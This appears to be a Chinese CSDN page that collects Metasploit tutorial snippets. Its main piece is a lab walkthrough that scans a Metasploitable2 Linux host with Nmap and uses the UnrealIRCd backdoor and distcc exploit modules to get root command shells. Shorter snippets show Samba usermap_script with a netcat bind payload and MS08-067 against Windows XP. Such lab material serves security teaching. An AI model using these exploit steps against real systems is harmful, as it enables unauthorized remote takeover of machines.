精华内容
下载资源
问答
  • Metasploit 攻击

    2017-12-22 02:25:49
    service postgresql start mfsconsole search samba use multi/samba/usermap_script show payloads set payloads cmd/unix/bind_netcat show options set rhost 10.10.10.254《Metasploit渗透魔鬼训练营》
    service postgresql start
    mfsconsole
    search samba
    use multi/samba/usermap_script
    show payloads
    set payloads cmd/unix/bind_netcat
    show options
    set rhost 10.10.10.254
    exploit

    参考
    《Metasploit渗透魔鬼训练营》

    漏洞原理
    http://blog.csdn.net/isinstance/article/details/53490084

    展开全文
  • metasploit 浏览器攻击

    2018-01-20 17:16:16
    metasploit 浏览器攻击metasploit 浏览器攻击metasploit 浏览器攻击
  • Metasploit攻击linux实例

    千次阅读 2020-12-28 14:50:00
    通过该实验了解Metasploit的基本框架,掌握metasploit攻击操作系统的一般方法 二、实验环境 漏洞主机:linux, IP 地址:10.1.1.136 攻击主机:Kali linux, IP地址:10.1.1.141 三、实验内容与实验要求 初步了解实验...

    一、实验目的
    通过该实验了解Metasploit的基本框架,掌握metasploit攻击操作系统的一般方法
    二、实验环境
    在这里插入图片描述
    漏洞主机:linux, IP 地址:10.1.1.136
    攻击主机:Kali linux, IP地址:10.1.1.141

    三、实验内容与实验要求
    初步了解实验环境及漏洞信息搜集
    利用UnrealIRCd后门漏洞攻击漏洞主机
    利用Distcc后门漏洞攻击Metasploitable2漏洞主机
    Distcc后门漏洞

    四、实验过程与分析
    查看Metasploitable2漏洞主机的登录用户及网络配置信息,从下图2可以看出漏洞主机登陆用户为msfadmin ,IP为192.168.220.136。使用命令如下:
    whoami 查看当前登陆用户
    ifconfig 查看网络配置信息
    在这里插入图片描述
    图2 查询漏洞主机信息
    可以看出漏洞主机登陆用户为msfadmin ,IP为192.168.220.136。
    查看攻击者主机登陆用户及网络配置信息,从下图3可以看出攻击主机登陆用户为root ,IP为192.168.220.141
    whoami 查看当前登陆用户
    ifconfig 查看网络配置信息
    在这里插入图片描述
    图3 查询攻击主机信息
    扫描漏洞主机开放的端口,根据开放端口信息判断漏洞主机存在的安全问题。扫描结果如图4所示。执行Nmap对漏洞主机进行扫描,下述命令中各参数含义如下:-sT表示tcp端口扫描(完整三次握手),-v表示显示详细信息-v。使用命令:
    利用口令: nmap -sT -v 192.168.220.136 扫描漏洞主机开发端口信息,扫描结果如下:
    在这里插入图片描述
    图4 扫描漏洞主机开发端口
    实验步骤二
    UnrealIRCd后门漏洞简介
    安全组织索引
    CVE:CVE-2010-2075
    BID:BID-40820
    OSVDB:OSVDB-65445
    原理
    在2009年11月到2010年6月间分布于某些镜面站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。
    参考链接
    http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt
    影响系统/软件
    Unreal UnrealIRCd 3.2.8.1
    攻击步骤
    分析可以利用的漏洞
    Nmap扫描结果如图5所示,漏洞主机开启了大量的端口,也就意味着对外提供了大量的服务,增加了被攻击的风险。其中6667号端口开放IRC服务,可以利用UnrealIRCD IRC软件的漏洞来攻击漏洞主机。
    在这里插入图片描述
    图5 扫描漏洞主机开发端口对应协议
    开启Msfconsole
    运行“msfconsole”命令开启msf,图6为MSF启动后的初始化界面,从图中可以看出v4.8.2-2014010101版本Metasploit包括了1246个EXP,678个辅助模块,324个负载,32个编码器,8个无操作生成器。
    在这里插入图片描述

    搜索漏洞利用EXP
    运行“search unrealircd”命令搜索关于UnrealIRCD漏洞的利用信息
    在这里插入图片描述

    运行漏洞利用EXP
    运行“use exploit/unix/irc/unreal_ircd_3281_backdoor”命令开始运行EXP
    在这里插入图片描述
    使用’show options’ 命令查看该exploit的参数设置信息,发现执行该EXP前可以配置漏洞主机的IP和端口
    在这里插入图片描述

    设置漏洞主机IP
    运行“set RHOST 192.168.220.136 ”命令设置漏洞主机IP
    在这里插入图片描述

      附:该EXP默认端口为6667,与Metasploitable2漏洞主机开启IRC服务的端口一致,所以不用修改端口。
    

    执行EXP
    运行“exploit”命令,提示“Command shell session 1 opened (192.168.220.141:4444 -> 192.168.220.136:44972) at 2014-11-27 19:28:45 +0800”说明攻击成功,成功建立shell回话。
    在这里插入图片描述

    验证shell权限
    运行linux系统命令“whoami”,回显“root”说明当前shell的权限是root权限,可进行任意操作而不受权限控制。
    在这里插入图片描述

    实验步骤三
    安全组织索引
    CVE:CVE-2004-2687
    BID:无
    OSVDB:OSVDB-13378
    原理
    Distcc用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,该漏洞是XCode 1.5版本及其他版本的distcc 2.x版本配置对于服务器端口的访问不限制。
    参考链接如下:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=2004-2687
    http://metasploit.com/modules/exploit/unix/misc/distcc_exec
    影响系统/软件
    distcc 2.x
    利用步骤
    在kali中执行“msfconsole”命令,启动metasploit
    在这里插入图片描述
    运行命令:“ use exploit/unix/misc/distcc_exec”选择漏洞利用EXP
    在这里插入图片描述
    运行命令:“set RHOST 192.168.220.136”,设置漏洞主机的IP
    在这里插入图片描述
    运行命令:“exploit”,开始攻击,出现“Command shell session 1 opened (192.168.220.141:4444 -> 192.168.220.136:58669) at 2014-11-27 20:00:27 +0800”说明shell建立成功
    在这里插入图片描述
    运行命令:“whoami”验证创立的shell的权限
    在这里插入图片描述

    展开全文
  • Metasploit漏洞攻击 Metasploit是一款开源的安全漏洞检测工具,Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境...

    Metasploit漏洞攻击

    Metasploit是一款开源的安全漏洞检测工具,Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠平台。这种可以扩展的模型将负载控制(payload)、编码器(encode)、无操作生成器(nops)和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。
    通过演示攻击Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)漏洞,掌握Metasploit的使用并进行漏洞攻击。
    Metasploit Kali2. windows xp sp3 靶机IP:192.168.20.16 攻击机:192.168.20.701.

    在msfconsole使用search命令搜索MS08067漏洞攻击程序

     

    从结果中得到
    Name : exploit/windows/smb/ms08_067_netapi
    Disclosure Date:2008-10-28
    Rank:great
    Description:MS08-067 Microsoft Server Service Relative Path Stack Corruption
    2.使用use命令调用MS08067漏洞攻击程序

    use exploit/windows/smb/ms08_067_netapi

    3.使用show options 命令查看需要设置的选项

    4.从图中可以看到还需设置RHOST(目标地址)、Exploit target(攻击目标)
    使用 set 命令设置 Module Options,此处需要设置目标IP
    即 set RHOST 192.168.20.16

    5.使用 set 命令设置后,可再使用show options 命令查看设置情况

    6.使用check命令检查漏洞是否存在

    7.设置Exploit target,使用show targets 查看可选项可以看出以下版本的系统均存在此漏洞因为实例演示的XP系统为WinXP SP3 简体中文版,即

    8.使用set target 命令设置目标,此处即为set target 34

    9.执行exploit命令后得到一个meterpreter

    10.在meterpreter中输入shell即可进入CMD窗口

    漏洞利用完成。实验结束。

    展开全文
  • Metasploit攻击Oracle的环境搭建.pdf
  • Metasploit攻击winXP实例

    2021-05-22 15:13:29
    service metasploit start 在另一个终端启动Metasploit服务 armitage 启动Armitage 5.进入Armitage初始界面 扫描目标网段完整信息 7.扫描网段 8.扫描出主机 查看目标主机上开启的服务,选中目标主机...
    1. ipconfig 查看网络配置信息
      在这里插入图片描述

    2.关闭目标主机防火墙
    在这里插入图片描述

    3.攻击主机查看当前用户和ip地址
    在这里插入图片描述

    1. service postgresql start 启动PostgreSQL服务
      service metasploit start 在另一个终端启动Metasploit服务
      armitage 启动Armitage
      在这里插入图片描述在这里插入图片描述
      在这里插入图片描述

    5.进入Armitage初始界面
    在这里插入图片描述

    1. 扫描目标网段完整信息 在这里插入图片描述

    7.扫描网段
    在这里插入图片描述

    8.扫描出主机
    在这里插入图片描述

    1. 查看目标主机上开启的服务,选中目标主机10.1.1.130,右键选择Services。 在这里插入图片描述

    2. 定向扫描目标主机右键选择Scan,Armitage会调用Metasploit的漏洞扫描模块,对10.1.1.130进行漏洞扫描。在这里插入图片描述

    3. 寻找合适的攻击模块。选中10.1.1.130主机,依次选择菜单栏Attacks-Find Attacks,Armitage会开始自动搜索寻找合适的攻击模块。

    在这里插入图片描述

    1. 完成对目标主机的攻击模块搜索以后,选中10.1.1.130主机右键可以发现多了Attack菜单。这里选择SMB漏洞对XP目标主机进行攻击,依次选择Attack》smb》ms08_067_netapi菜单。
      在这里插入图片描述

    2. 漏洞攻击xp
      在弹出的攻击配置对话框中Targets处配置目标主机的系统,10.1.1.130主机是简体中文版xp系统,故选择41=>Windows XP SP3 Chinese-Simplified{NX)在这里插入图片描述

    3. 攻击完成后,目标主机的图标会发生明显变化,Armitage会自动建立一个驻留在内存的shellcode 也就是Meterpreter,右键打开Meterpreter shell,输入getuid命令查看当前用户的权限是SYSTEM权限,攻击完成。
      在这里插入图片描述

    15攻击完成

    在这里插入图片描述

    展开全文
  • 这是一个简单的metasploit使用实例: 首先,我们要先准备一些东西: 1.kali 虚拟机 2.kali IP地址:192.168.222.128 (可使用ifconfig查询) 3.一个kali没有使用的端口:5555 4.一个可以与kali通信的靶机:windows ...
  • Metasploit攻击winserver2008实例

    千次阅读 2020-03-31 10:03:41
    Metasploit攻击winserver2008实例 一、实验目的 1)了解拒绝服务攻击的原理及其危害 2)了解SMB协议及其漏洞信息 3)使用Metasploit对win2008系统进行拒绝服务攻击 二、实验环境 漏洞主机:win server 2008,IP地址...
  • Metasploit 攻击winXP

    千次阅读 2016-01-06 17:06:38
    扫描靶机漏洞端口是否可以攻击 nmap -p 445 -script smb-check-vulns -script-args=unsafe=1 TARGETIP 输出结果: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-06 12:35 HKT Nmap scan ...
  • metasploit攻击win7

    2021-03-27 16:57:11
    攻击开始: 在Kali上启动nussus服务(/etc/init.d/nessusd start) 访问Nessus控制端https://127.0.0.1:8834/ 使用nusses的作用是对靶机进行扫描,寻找它可以利用的漏洞 新建一个扫描,依次选择“New Scan”-...
  • 我使用了metasploit 攻击靶机后使用run vnc命令失败 有没有人告诉我怎么解决呀
  • 通过该实验熟悉Nessus漏洞扫描工具的安装和主机漏洞扫描的方法,学会利用Nessus扫描结果筛选合适的Metasploit攻击模块进行安全测试、攻击。 二、实验环境 图1 实验拓扑图 漏洞主机:win7,IP地址:10.1.1.129 攻击...
  • metasploit 自动攻击

    2018-11-15 01:10:33
    metasploit 自动攻击
  • 首先我在Kali下生成一个Android的应用程序,即apk格式的文件,用到的命令是: ...注释:-p:指的是在本次环境中攻击所使用的payload,这个payload就是将Android攻击成功之后的反弹连接发送到攻...
  • Metasploit漏洞攻击实战

    2016-04-12 15:21:58
    Metasploit漏洞攻击实战
  • metasploit模拟攻击

    2017-03-17 08:45:55
    渗透测试基础分享,metasploit的基础介绍,和一次实战模拟
  • 转载请注明出处:... 攻击机: kali 192.168.109.137 靶机: windows server 2012 192.168.109.141 工具:Metasploit 根据CVE-2014-6287的描述,Rejetto网络文件服务器(也被称为HSF或者HttpFi...
  • Metasploit中关于Oracle的攻击模块默认并不完全,需要自己做一些工作。本文主要记录在搭建环境的中的一些错误(操作系统Backtrack 5)。在默认情况下使用oracle的一些攻击功能会出现类似如下错误:...
  • metasploit网站漏洞进行攻击

    千次阅读 2018-11-23 23:21:23
    针对PHP网站常见的攻击方式中的命令攻击。Command Injection,即命令注入攻击,是指这样一种攻击手段,黑客通过把HTML代码输入一个输入机制(例如缺乏有效验证限制的表格域)来改变网页的动态 生成的内容。使用系统...
  • Metasploit渗透攻击

    2019-09-25 14:20:04
    Metasploit渗透攻击 源网址https://www.freebuf.com/column/194412.html Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行...
  • MetaSploit渗透攻击平台

    2013-04-20 01:40:38
    bt5下的。MetaSploit渗透攻击平台。
  • 本次网络安全实践选题为“Metasploit攻击win8实例”有诸多原因:其一,Metasploit是一款功能强大、易于获取、操作相对简便的开源漏洞检测工具,被广泛用于个人电脑安全检测,甚至也被黑客用来实施网络攻击,因此有...
  • 转载请注明出处:... 攻击机:Kali 192.168.109.137 靶机:Metasploitable2 192.168.109.140 内网另一主机: Metasploitable2 192.168.109.159 工具:Metasploit 1.开启MSF msfc...
  • Nessus+metasploit 利用Nessus扫描目标主机 启动Nessus服务 /etc/init.d/nessusd start 访问Nessus控制端https://127.0.0.1:8834/ 配置扫描信息,主要设置扫描名称、描述和扫描目标三个信息即可,其他配置选择...
  • Metasploit 进阶第三讲 深入理解攻击载荷 01 Nesus介绍、安装及使用 Nessus介绍 Nessus是一款著名的漏洞扫描及分析工具,提供完整的漏洞扫描服务,并随时更新漏洞数据库。 采用B/S模式,服务器端负责执行...
  • Metasploit 进阶第一讲 攻击流程及命令介绍 01.渗透测试过程环节(PTES) 1.前期交互阶段:与客户组织进行交互讨论,确定范围,目标等 2.情报搜集阶段:获取更多目标组织信息,Nmap、Nessus等 3.威胁建模...
  • metasploit 自动攻击步骤 1 db_driver 2 db_create 3 db_nmap 4 db_autopwn
  • Metasploit攻击win7实例(下)

    千次阅读 2020-12-24 11:15:47
    在 Win7靶机打开IE,访问http://10.1.1.128:8060/baidu.com,模拟受害者误点击网页,靶机IE如下图所示,攻击Metasploit显示如下图所示信息表明攻击成功。 12 验证攻击是否成功。列出当前成功建立的回话,任意进入...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 8,197
精华内容 3,278
关键字:

metasploit攻击网站